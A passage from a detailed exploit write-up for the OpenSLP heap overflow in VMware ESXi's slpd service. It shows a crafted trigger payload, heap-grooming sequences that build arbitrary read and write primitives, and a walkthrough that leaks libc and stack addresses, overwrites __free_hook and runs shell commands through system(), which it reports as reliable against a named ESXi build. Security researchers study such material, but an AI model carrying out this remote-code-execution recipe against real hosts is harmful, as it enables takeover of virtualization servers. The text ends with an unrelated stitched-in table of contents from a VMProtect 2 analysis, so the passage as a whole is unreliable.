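This is how an SLP client would recover the product string and hardware UUID from the reply body, after stripping the 16-byte header and the attr-list length field.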

Next, a ‘service registration’ packet looks like

      0                   1                   2                   3
      0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
     +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
     |         Service Location header (function = SrvReg = 3)       |
     +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
     |                          <URL-Entry>                          \
     +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
     | length of service type string |        <service-type>         \
     +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
     |     length of <scope-list>    |         <scope-list>          \
     +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
     |  length of attr-list string   |          <attr-list>          \
     +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
     |# of AttrAuths |(if present) Attribute Authentication Blocks...\
     +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
  (diagram from https://datatracker.ietf.org/doc/html/rfc2608#section-8.3)
 
      URL Entries
      
      0                   1                   2                   3
      0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
     +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
     |   Reserved    |          Lifetime             |   URL Length  |
     +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
     |URL len, contd.|            URL (variable length)              \
     +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
     |# of URL auths |            Auth. blocks (if any)              \
     +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
  (diagram from https://datatracker.ietf.org/doc/html/rfc2608#section-4.3)
  
[SLP Client-1] connect

Header:  bytearray(b'\x02\x03\x00\x003\x00\x00\x00\x00\x00\x00\x14\x00\x02en')
Body:  bytearray(b'\x00\x00x\x00\t127.0.0.1\x00\x00\x0bservice:AAA\x00\x07default\x00\x03BBB\x00')

<URL-Entry>: 

   Reserved:  0x00
   Lifetime:  0x0078
   URL Length:  0x0009
   URL (variable length):  b'127.0.0.1'
   # of URL auths:  0x00
   Auth. blocks (if any):  b''
   
length of service type string:  0x000b
<service-type>:  b'service:AAA'
length of <scope-list>:  0x0007
<scope-list>:  b'default'
length of attr-list string:  0x0003
<attr-list>:  b'BBB'
# of AttrAuths:  0x00
(if present) Attribute Authentication Blocks...:  b''

[SLP Client-1] service registration
[SLP Client-1] recv:  b'\x02\x05\x00\x00\x12\x00\x00\x00\x00\x00\x00\x14\x00\x02en\x00\x00'

Lastly, a ‘directory agent advertisement’ packet looks like

      0                   1                   2                   3
      0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
     +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
     |        Service Location header (function = DAAdvert = 8)      |
     +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
     |          Error Code           |  DA Stateless Boot Timestamp  |
     +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
     |DA Stateless Boot Time,, contd.|         Length of URL         |
     +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
     \                              URL                              \
     +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
     |     Length of <scope-list>    |         <scope-list>          \
     +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
     |     Length of <attr-list>     |          <attr-list>          \
     +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
     |    Length of <SLP SPI List>   |     <SLP SPI List> String     \
     +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
     | # Auth Blocks |         Authentication block (if any)         \
     +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
  (diagram from https://datatracker.ietf.org/doc/html/rfc2608#section-8.5)

[SLP Client-1] connect

Header:  bytearray(b'\x02\x08\x00\x00N\x00\x00\x00\x00\x00\x00\x00\x00\x02en')
Body:  bytearray(b'\x00\x00`\xa4`S\x00+service:VMwareInfrastructure:/192.168.0.191\x00\x03BBB\x00\x00\x00\x00\x00\x00')

Error Code:  0x0000
Boot Timestamp:  0x60a46053
Length of URL:  0x002b
URL:  b'service:VMwareInfrastructure:/192.168.0.191'
Length of <scope-list>:  0x0003
<scope-list>:  b'BBB'
Length of <attr-list>:  0x0000
<attr-list>:  0x0000
Length of <SLP SPI List>:  0x0000
<SLP SPI List> String:  b''
# Auth Blocks:  0x0000
Authentication block (if any):  b''

[SLP Client-1] directory agent advertisement
[SLP Client-1] recv:  b''

The Bug

As noted in Lucas’ blog, the bug is in the ‘SLPParseSrvUrl’ function, which is called when a ‘directory agent advertisement’ message is being processed.

undefined4 SLPParseSrvUrl(int param_1,char *param_2,void **param_3)

{
  char cVar1;
  void **__ptr;
  char *pcVar2;
  char *pcVar3;
  void *pvVar4;
  char *pcVar5;
  char *__src;
  char *local_28;
  void **local_24;
  
  if (param_2 == (char *)0x0) {
    return 0x16;
  }
  *param_3 = (void *)0x0;
  __ptr = (void **)calloc(1,param_1 + 0x1d);                                       [1]
  if (__ptr == (void **)0x0) {
    return 0xc;
  }
  pcVar2 = strstr(param_2,":/");                                                   [2]
  if (pcVar2 == (char *)0x0) {
    free(__ptr);
    return 0x16;
  }
  pcVar5 = param_2 + param_1;
  memcpy((void *)((int)__ptr + 0x15),param_2,(size_t)(pcVar2 + -(int)param_2));    [3]

At [1], the length of the URL is added to the constant 0x1d to form the final size passed to ‘calloc’. At [2], ‘strstr’ is called to find the position of the substring “:/” within the URL. At [3], the content of the URL preceding “:/” is copied into the memory newly allocated at [1].

Another thing to note is that ‘strstr’ returns NULL if the substring “:/” does not exist, and that it stops searching once it hits a null character.

I speculate that the VMware test cases only tried ‘scope-list’ values with lengths below 256. Looking at the following ‘directory agent advertisement’ layout snippets, sample 1’s two-byte ‘scope-list’ length contains a null byte. This null byte accidentally acts as the string terminator for ‘URL’, since it sits right after it. If the ‘scope-list’ length is 256 or above, its two-byte representation no longer contains a null byte (as in sample 2), so ‘strstr’ will read past the ‘URL’ and continue seeking the substring “:/” inside the ‘scope-list’.

Sample 1 - won't trigger bug:

Body:  bytearray(b'\x00\x00`\xa4`S\x00+service:VMwareInfrastructure:/192.168.0.191\x00\x03BBB\x00\x00\x00\x00\x00\x00')

Error Code:  0x0000
Boot Timestamp:  0x60a46053
Length of URL:  0x002b
URL:  b'service:VMwareInfrastructure:/192.168.0.191'
****** Length of <scope-list>:  0x0003 ******
<scope-list>:  b'BBB'
Length of <attr-list>:  0x0000
<attr-list>:  0x0000
Length of <SLP SPI List>:  0x0000
<SLP SPI List> String:  b''
# Auth Blocks:  0x0000
Authentication block (if any):  b''

Sample 2 - triggers the bug:

Body:  bytearray(b'\x00\x00`\xa4\x9a\x14\x00\x18AAAAAAAAAAAAAAAAAAAAAAAA\x02\x98BBBBBBBBBBBBBA\x01:/CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC\x00\x00\x00\x00\x00\x00')

Error Code:  0x0000
Boot Timestamp:  0x60a49a14
Length of URL:  0x0018
URL:  b'AAAAAAAAAAAAAAAAAAAAAAAA'
****** Length of <scope-list>:  0x0298 ******
<scope-list>:  b'BBBBBBBBBBBBBA\x01:/CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC'
Length of <attr-list>:  0x0000
<attr-list>:  0x0000
Length of <SLP SPI List>:  0x0000
<SLP SPI List> String:  b''
# Auth Blocks:  0x0000
Authentication block (if any):  b''

Therefore, the ‘memcpy’ call leads to a heap overflow, because the source contains the ‘URL’ plus part of the ‘scope-list’, while the destination only has room for the ‘URL’.
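The allocation/copy mismatch can be modeled in a few lines of Python. This is a size-only reconstruction of my own (not code from the exploit) that mirrors the `[1]`/`[2]`/`[3]` operations in the decompiled listing:

```python
# Toy model of SLPParseSrvUrl: calloc() sizes the destination from the
# declared URL length, but strstr() is not bounded by that length.
def parse_srvurl_copy(url_field: bytes, trailing: bytes):
    """url_field: the attacker-declared URL bytes; trailing: whatever follows
    it in the same packet buffer. Returns (alloc_size, copy_size)."""
    alloc = len(url_field) + 0x1D      # calloc(1, param_1 + 0x1d)           [1]
    buf = url_field + trailing         # strstr keeps reading past the URL
    idx = buf.find(b":/")              # strstr(param_2, ":/")               [2]
    nul = buf.find(b"\x00")
    if idx < 0 or (0 <= nul < idx):    # strstr stops at a null terminator
        return alloc, None
    return alloc, idx                  # memcpy of idx bytes at offset 0x15  [3]

# Sample 2 shape: scope-list length >= 0x100, so no null byte before ":/".
alloc, copy = parse_srvurl_copy(
    b"A" * 24, b"\x02\x98" + b"B" * 14 + b"\x01:/" + b"C" * 0x286)
overflow = copy is not None and 0x15 + copy > alloc
```

With the sample 1 shape (“:/” inside the URL and a null byte right after it), `copy` stays within `alloc` and no overflow occurs.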

SLP Objects

Here I will go over the relevant SLP components as they serve as the building blocks for exploitation.

_SLPDSocket

Every client that connects to the ‘slpd’ daemon causes a ‘slpd-socket’ object to be created on the heap. This object tracks the current state of the connection, such as whether it is in a reading state or a writing state. It also stores the client’s IP address, the socket file descriptor used by the connection, pointers to the ‘recv-buffer’ and ‘send-buffer’ for this specific connection, and pointers to the ‘slpd-socket’ objects of the previously and subsequently established connections. The size of this object is fixed at 0xd0 and cannot be changed.

// https://github.com/openslp-org/openslp/blob/df695199138ce400c7f107804251ccc57a6d5f38/openslp/slpd/slpd_socket.h
/** Structure representing a socket
 */
typedef struct _SLPDSocket
{
   SLPListItem listitem;    
   sockfd_t fd;
   time_t age;    /* in seconds -- in unicast dgram sockets, this also drives the resend logic */
   int state;
   int can_send_mcast;  /*Instead of allocating outgoing sockets to for sending multicast messages, slpd
                          uses incoming unicast sockets that were bound to the network interface.  Unicast
                          sockets are used because some stacks use the multicast address as the source address
                          if the socket was bound to the multicast address.  Since we don't want to send
                          mcast out of all the unicast sockets, this flag is used*/

   /* addrs related to the socket */
   struct sockaddr_storage localaddr;
   struct sockaddr_storage peeraddr;
   struct sockaddr_storage mcastaddr;

   /* Incoming socket stuff */
   SLPBuffer recvbuf;
   SLPBuffer sendbuf;

   /* Outgoing socket stuff */
   int reconns; /*For stream sockets, this drives reconnect.  For unicast dgram sockets, this drives resend*/
   SLPList sendlist;
#if HAVE_POLL
   int fdsetnr;
#endif
} SLPDSocket;
memory layout for a _SLPDSocket object

_SLPBuffer

Each SLP message received by the server creates at least two SLPBuffer objects. One is the ‘recv-buffer’, which stores the data the server receives from the client. Since I control the size of the data I send from the client, I control the size of the ‘recv-buffer’. The other SLPBuffer object is the ‘send-buffer’, which stores the data the server will send back to the client. The ‘send-buffer’ has a fixed size of 0x598, which I cannot control. Furthermore, the SLPBuffer has metadata pointers to the starting, current, and ending positions of its data.

//https://github.com/openslp-org/openslp/blob/df695199138ce400c7f107804251ccc57a6d5f38/openslp/common/slp_buffer.h
/** Buffer object holds SLP messages.
 */
typedef struct _SLPBuffer
{
   SLPListItem listitem;   /*!< @brief Allows SLPBuffers to be linked. */
   size_t allocated;       /*!< @brief Allocated size of buffer. */
   uint8_t * start;        /*!< @brief Points to start of space. */
   uint8_t * curpos;       /*!< @brief @p start < @c @p curpos < @p end */
   uint8_t * end;          /*!< @brief Points to buffer limit. */
} * SLPBuffer;
memory layout for a _SLPBuffer object
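The field offsets of _SLPBuffer can be sketched with ctypes. This assumes a 32-bit build (hinted at by the `(int)` pointer casts in the decompiled SLPParseSrvUrl), so pointers are modeled as `c_uint32` stand-ins purely to compute offsets:

```python
import ctypes

# 32-bit layout sketch of _SLPBuffer (assumption: slpd is a 32-bit binary).
class SLPBuffer32(ctypes.Structure):
    _fields_ = [
        ("previous",  ctypes.c_uint32),  # SLPListItem.previous
        ("next",      ctypes.c_uint32),  # SLPListItem.next
        ("allocated", ctypes.c_uint32),  # allocated size of the buffer
        ("start",     ctypes.c_uint32),  # position pointer: start of data
        ("curpos",    ctypes.c_uint32),  # position pointer: current position
        ("end",       ctypes.c_uint32),  # position pointer: buffer limit
    ]

# The exploitation later targets these position-pointer offsets.
offsets = {name: getattr(SLPBuffer32, name).offset
           for name, _ in SLPBuffer32._fields_}
```

Under this layout, the three position pointers sit at offsets 12, 16, and 20, which is what a partial overwrite from an adjacent chunk has to reach.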

SLP Socket State

The SLP socket state defines the status of a particular connection. The state value is stored in the _SLPDSocket object. A connection will either call ‘recv’ or ‘send’ depending on the state of its socket.

//https://github.com/openslp-org/openslp/blob/df695199138ce400c7f107804251ccc57a6d5f38/openslp/slpd/slpd_socket.h
/* Values representing a type or state of a socket */
#define SOCKET_PENDING_IO       100
#define SOCKET_LISTEN           0
#define SOCKET_CLOSE            1
#define DATAGRAM_UNICAST        2
#define DATAGRAM_MULTICAST      3
#define DATAGRAM_BROADCAST      4
#define STREAM_CONNECT_IDLE     5
#define STREAM_CONNECT_BLOCK    6   + SOCKET_PENDING_IO
#define STREAM_CONNECT_CLOSE    7   + SOCKET_PENDING_IO
#define STREAM_READ             8   + SOCKET_PENDING_IO
#define STREAM_READ_FIRST       9   + SOCKET_PENDING_IO
#define STREAM_WRITE            10  + SOCKET_PENDING_IO
#define STREAM_WRITE_FIRST      11  + SOCKET_PENDING_IO
#define STREAM_WRITE_WAIT       12  + SOCKET_PENDING_IO

states constants defined in OpenSLP source code
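Note that the stream states the exploit later flips a socket into (‘STREAM_READ’, ‘STREAM_WRITE’) are defined relative to SOCKET_PENDING_IO, so the value actually stored in the ‘slpd-socket’ state field is the offset sum. A small Python mirror of the macros makes the concrete values explicit:

```python
# Mirror of the OpenSLP state constants: the value stored in a slpd-socket's
# `state` field for stream states includes the SOCKET_PENDING_IO offset.
SOCKET_PENDING_IO = 100
STREAM_READ       = 8  + SOCKET_PENDING_IO   # state while expecting recv()
STREAM_WRITE      = 10 + SOCKET_PENDING_IO   # state while expecting send()
```

So overwriting a socket object into the ‘STREAM_WRITE’ state means writing the value 110, not 10.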

It is important to understand the properties of _SLPDSocket, _SLPBuffer, and the socket states, because the exploitation process requires modifying those values.

Objectives, Expectations and Limitations

This section goes over objectives required to land a successful exploitation.

Objective 1

Achieve remote code execution by leveraging the heap overflow to overwrite ‘__free_hook’ so that it points to shellcode or a ROP chain.

Expectation 1

If I can overwrite the ‘position’ pointers of a _SLPBuffer ‘recv-buffer’ object, I can force incoming data to the server to be written to an arbitrary memory location.

Objective 2

In order to know the address of ‘__free_hook’, I have to leak an address referencing the libc library.

Expectation 2

If I can overwrite the ‘position’ pointers of a _SLPBuffer ‘send-buffer’ object, I can force outgoing data from the server to be read from an arbitrary memory location.

Now that I have defined goals and objectives, I have to identify any limitations of the heap overflow vector and of memory allocation in general.

Limitations

  1. ‘URL’ data stored in the “Directory Agent Advertisement’s URL” object cannot contain null bytes (because ‘strstr’ stops at them). This limitation prevents me from directly overwriting metadata within an adjacent ‘_SLPDSocket’ or ‘_SLPBuffer’ object, because I would have to supply an invalid size value for the object’s heap header before reaching those properties.
  2. The ‘slpd’ binary allocates ‘_SLPDSocket’ and ‘_SLPBuffer’ objects with ‘calloc’, which zeroes out the allocated memory slot. This removes all past data of a memory slot, which could contain interesting pointers or stack addresses. It looks like a showstopper: if I were to overwrite a ‘position’ pointer in a _SLPBuffer, I would need to know a valid address value. Since I don’t know such a value, the next best thing would be to partially overwrite a ‘position’ pointer to at least land in an address range that could be meaningful. With ‘calloc’ zeroing everything out, I lose that opportunity.

Fortunately, not all is lost. As shared in Lucas’ blog post, I can still get around the limitations.

Limitations Bypass

  1. Use the heap overflow to partially overwrite the adjacent free memory chunk’s size, extending it. By extending the free chunk, I can position it to overlap with the neighboring ‘_SLPDSocket’ or ‘_SLPBuffer’ object. When I then allocate memory that occupies the extended free space, I can overwrite that object’s properties.
  2. The ‘calloc’ call retains the past data of a memory slot if the slot was marked ‘IS_MAPPED’ while it was freed. The key is that the ‘calloc’ request must be for exactly the same size as the freed ‘IS_MAPPED’ slot in order to preserve its old data. If an ‘IS_MAPPED’ freed chunk is split up by a ‘calloc’ request, ‘calloc’ services a chunk without the ‘IS_MAPPED’ flag and zeroes out the slot’s contents.

There is still one more catch. Even if I can point a _SLPBuffer at an arbitrary position to store or read data, the ‘slpd’ binary will not comply unless the associated socket state is set to the proper status. Therefore, the heap overflow also has to overwrite the associated _SLPDSocket object’s metadata in order for the arbitrary read and write primitives to work.

Heap Grooming

This section goes over the heap grooming strategy used to set up the read and write primitives.

The Building Blocks

Before I go over the heap grooming design, I want to say a few words about the purpose of the SLP messages mentioned earlier in fitting into the exploitation process.

service request — primarily used to create a consecutive heap layout and to punch holes in it.

directory agent advertisement — used to trigger the heap overflow and overwrite into the neighboring memory block.

service registration — stores user-controlled data in the in-memory database, to be retrieved later through the ‘attribute request’ message. This message solely sets up ‘attribute request’ and is not used for heap grooming.

attribute request — pulls user-controlled data from the in-memory database. Its purpose is to create a ‘marker’ that identifies the current position during the information leak stage. In addition, the dynamic memory used to store the user-controlled data makes a good stack pivot location with fully user-controllable content.

Overwrite _SLPBuffer ‘send-buffer’ object (Arbitrary Read Primitive)

(1). Clients A, B, and C create connections to the server. Client A sends a ‘service request’ message. Client D creates a connection and sends a ‘service request’ message. Client B sends a ‘service request’ message.
(2). Close client D’s connection.
(3). Client E creates a connection and sends an ‘attribute request’ message.
(4). Client E’s ‘send-buffer’ goes through reallocation because the data is too large.
(5). Client E’s connection is still intact and not closed; however, the ‘message’ object is now freed.
(6). Clients G and H create connections to the server. Client C now sends a ‘service request’ to fill the hole left by client E’s ‘send-buffer’ reallocation and the freed ‘message’ object.
(7). Close client B’s connection.
(8). Client F creates a connection to the server and sends a ‘directory agent advertisement’ message. This leaves a freed chunk of size 0x100 right after the ‘URL’ object for extension and overlapping.
(9). The ‘URL’ object extends its neighboring freed chunk’s size from 0x100 to 0x120. The server then frees the objects allocated for client F. It can be observed that all objects related to client F are freed and consolidated. The ‘URL’ object is freed as well, but because its size fits in the fastbin, it does not get coalesced.
(10). Client G sends a ‘service request’ message. The first-fit algorithm assigns the extended free block to client G’s ‘recv-buffer’ object. This object overlaps with client E’s ‘send-buffer’, so I can now overwrite the ‘position’ pointers in it.
(11). Client J creates a connection to the server and sends a ‘service request’ message. Its purpose is to fill the hole left by client F’s ‘directory agent advertisement’ message.
(12). Close client A’s connection.
(13). Client I creates a connection to the server and sends a ‘directory agent advertisement’ message.
(14). The ‘URL’ object extends its neighboring freed chunk’s size from 0x100 to 0x140. The server then frees the objects allocated for client I. It can be observed that all objects related to client I are freed and consolidated. The ‘URL’ object is freed as well, but because its size fits in the fastbin, it does not get coalesced.
(15). Client H sends a ‘service request’ message. The first-fit algorithm assigns the extended free block to client H’s ‘recv-buffer’ object. This object overlaps with client E’s ‘slpd-socket’, so I can now overwrite the properties in it.

Overwrite _SLPBuffer ‘recv-buffer’ object (Arbitrary Write Primitive)

(1). Client A creates a connection to the server and sends a ‘service request’ message. Client B creates a connection only. Client C creates a connection and sends a ‘service request’ message. Client B now sends a ‘service request’ message. Clients D and E create connections to the server.
(2). Close client C’s connection.
(3). Client F creates a connection to the server and sends a ‘directory agent advertisement’ message. This leaves a freed chunk of size 0x100 right after the ‘URL’ object for extension and overlapping.
(4). The ‘URL’ object extends its neighboring freed chunk’s size from 0x100 to 0x140. The server then frees the objects allocated for client F. It can be observed that all objects related to client F are freed and consolidated. The ‘URL’ object is freed as well, but because its size fits in the fastbin, it does not get coalesced.
(5). Client E sends a ‘service request’ message. The first-fit algorithm assigns the extended free block to client E’s ‘recv-buffer’ object. This object overlaps with client B’s ‘recv-buffer’, so I can now overwrite the ‘position’ pointers in it.
(6). Client G creates a connection to the server and sends a ‘service request’ message. Its purpose is to fill the hole left by client F’s ‘directory agent advertisement’ message.
(7). Close client A’s connection.
(8). Client H creates a connection to the server and sends a ‘directory agent advertisement’ message. This leaves a freed chunk of size 0x100 right after the ‘URL’ object for extension and overlapping.
(9). The ‘URL’ object extends its neighboring freed chunk’s size from 0x100 to 0x140. The server then frees the objects allocated for client H. It can be observed that all objects related to client H are freed and consolidated. The ‘URL’ object is freed as well, but because its size fits in the fastbin, it does not get coalesced.
(10). Client D sends a ‘service request’ message. The first-fit algorithm assigns the extended free block to client D’s ‘recv-buffer’ object. This object overlaps with client B’s ‘slpd-socket’, so I can now overwrite the properties in it.

The visual heap layouts above were created with villoc.

Exploitation Strategy Walkthrough

It is best to look at the exploit code along with following the below narration to understand how the exploit works.

  1. Client 1 sends a ‘directory agent advertisement’ request to prepare for any unexpected memory allocation that may happen for this particular request. I observed that the request makes additional memory allocations when the ‘slpd’ daemon runs at startup, but not when it is started through /etc/init.d/slpd start. Any unexpected allocations would eventually be freed and end up on the freelist. The assumption is that these unique freed slots will be reused by future ‘directory agent advertisement’ messages as long as I do not explicitly allocate memory that would hijack them.
  2. Clients 2–5 make a ‘service request’, each with a receive buffer of size 0x40. This fills up some initial freed slots on the freelist. If I don’t occupy these freed slots, they would hijack the ‘URL’ memory allocations of future ‘directory agent advertisement’ messages and ruin the heap grooming.
  3. Clients 6–10 set up client 7 to send the ‘service registration’ message to the server. The server only accepts ‘service registration’ messages originating from localhost, so client 7’s ‘slpd-socket’ must be overwritten to update its IP address. Once the message is sent, client 7’s socket object is updated again to hold the listening file descriptor so it can handle future incoming connections. If this step is skipped, future clients cannot establish connections with the server.
  4. Clients 11–21 set up the arbitrary read primitive by overwriting client 15’s ‘send-buffer’ position pointers. Since I have no knowledge of what addresses to leak in the first place, I perform a partial overwrite of the two least significant bytes of the ‘start’ position pointer with null values. This requires setting up the extended free chunk to be marked ‘IS_MAPPED’ to avoid being zeroed out by the ‘calloc’ call. The ‘send-buffer’ that gets updated belongs to the ‘attribute request’ message. As I have no visibility into how much data will be leaked, I can get a ballpark idea of where the leak is by including a marker value in the ‘service registration’ message from step 3. If the leaked content contains the marker, I know it is leaking data from the ‘attribute request’ ‘send-buffer’ object, which tells me it is about time to stop reading from the leak. Lastly, I have to update client 15’s ‘slpd-socket’ state to ‘STREAM_WRITE’, which makes the server call ‘send’ to my client.
  5. From the leak I collected heap addresses and libc addresses, from which I can derive everything else. My goal is to overwrite libc’s __free_hook with the address of libc’s system. I need a gadget that positions the stack at a location that won’t be altered by the application. I found a gadget in libc-2.17.so that lifts the stack pointer by 0x100.
  6. With the collected libc address, I can calculate libc’s environ address, which stores a stack address. I use clients 22–31 to set up the arbitrary read primitive to leak the stack address. I have to update client 25’s file descriptor in the ‘slpd-socket’ to hold the listening file descriptor.
  7. Clients 32–40 set up the arbitrary write primitive, which requires overwriting client 33’s ‘recv-buffer’ position pointers. It first stores shell commands in client 15’s ‘send-buffer’ object, a large slab of memory under my control. It then writes libc’s system address, a fake return address, and the address of the shell command to the predicted stack location where the stack lift will land. Afterwards, it overwrites libc’s __free_hook with the address of the stack-lifting gadget. Lastly, each arbitrary write requires updating the corresponding ‘slpd-socket’ object’s state to ‘STREAM_READ’; if this step is skipped, the server will not accept the overwritten position pointer values.
  8. The desired shell commands are executed once all of the above steps are completed.

Final Remark

I enjoyed implementing this exploit very much and learned a few things while writing it. One of the biggest things I learned is to never make assumptions and to always test ideas out. When I was trying to get the data leak portion of the exploit working, I was preparing to implement it the way Lucas described in his blog, which seemed slightly complicated. I was curious why I couldn’t simply flip the socket object’s state to ‘STREAM_WRITE’ to send the data back to me. After reviewing the OpenSLP code, I understood the problem and saw why Lucas came up with his particular solution. Nevertheless, I still wanted to see what would happen if I just flipped the state on the socket object, and to my disbelief, the daemon sent me the leaked data immediately without the additional hurdles. Another takeaway is that when doing any heap grooming design, it is best to work backward from how I want the heap to look in its finished form, back-tracking the layout to the beginning.

The PoC should work out of the box against VMware ESXi 6.7.0 build-14320388, which is the trial version. I was able to get it to work 14 out of 15 tries.

VMProtect 2 — Detailed Analysis of the Virtual Machine Architecture


Original text by _xeroxz

Download link: VMProtect 2 Reverse Engineering

Table Of Contents
Credit — Links to Existing Work
Preamble — Intentions and Purpose
Purpose
Intentions
Terminology
Introduction
Obfuscation — Deadstore, Opaque Branching
Opaque Branching Obfuscation Example
Deadstore Obfuscation Example
Overview — VMProtect 2 Virtual Machine
Rolling Decryption
Native Register Usage
Non-Volatile Registers — Registers With Specific Usage
Volatile Registers — Temp Registers
vm_entry — Entering The Virtual Machine
calc_jmp — Decryption Of Vm Handler Index
vm_exit — Leaving The Virtual Machine
check_vsp — relocate scratch registers
Virtual Instructions — Opcodes, Operands, Specifications
Operand Decryption — Transformations
VM Handlers — Specifications
LCONST — Load Constant Value Onto Stack
LCONSTQ — Load Constant QWORD
LCONSTCDQE — Load Constant DWORD Sign Extended to a QWORD
LCONSTCBW — Load Constant Byte Convert To Word
LCONSTCWDE — Load Constant Word Convert To DWORD
LCONSTDW — Load Constant DWORD
LREG — Load Scratch Register Value Onto Stack
LREGQ — Load Scratch Register QWORD
LREGDW — Load Scratch Register DWORD
SREG — Set Scratch Register Value
SREGQ — Set Scratch Register Value QWORD
SREGDW — Set Scratch Register Value DWORD
SREGW — Set Scratch Register Value WORD
SREGB — Set Scratch Register Value Byte
ADD — Add Two Values
ADDQ — Add Two QWORD Values
ADDW — Add Two WORDS Values
ADDB — Add Two Bytes Values
MUL — Unsigned Multiplication
MULQ — Unsigned Multiplication of QWORD’s
DIV — Unsigned Division
DIVQ — Unsigned Division Of QWORD’s
READ — Read Memory
READQ — Read QWORD
READDW — Read DWORD
READW — Read Word
WRITE — Write Memory
WRITEQ — Write Memory QWORD
WRITEDW — Write DWORD
WRITEW — Write WORD
WRITEB — Write Byte
SHL — Shift Left
SHLCBW — Shift Left Convert Result To WORD
SHLW — Shift Left WORD
SHLDW — Shift Left DWORD
SHLQ — Shift Left QWORD
SHLD — Shift Left Double Precision
SHLDQ — Shift Left Double Precision QWORD
SHLDDW — Shift Left Double Precision DWORD
SHR — Shift Right
SHRQ — Shift Right QWORD
SHRD — Double Precision Shift Right
SHRDQ — Double Precision Shift Right QWORD
SHRDDW — Double Precision Shift Right DWORD
NAND — Not Then And
NANDW — Not Then And WORD’s
READCR3 — Read Control Register Three
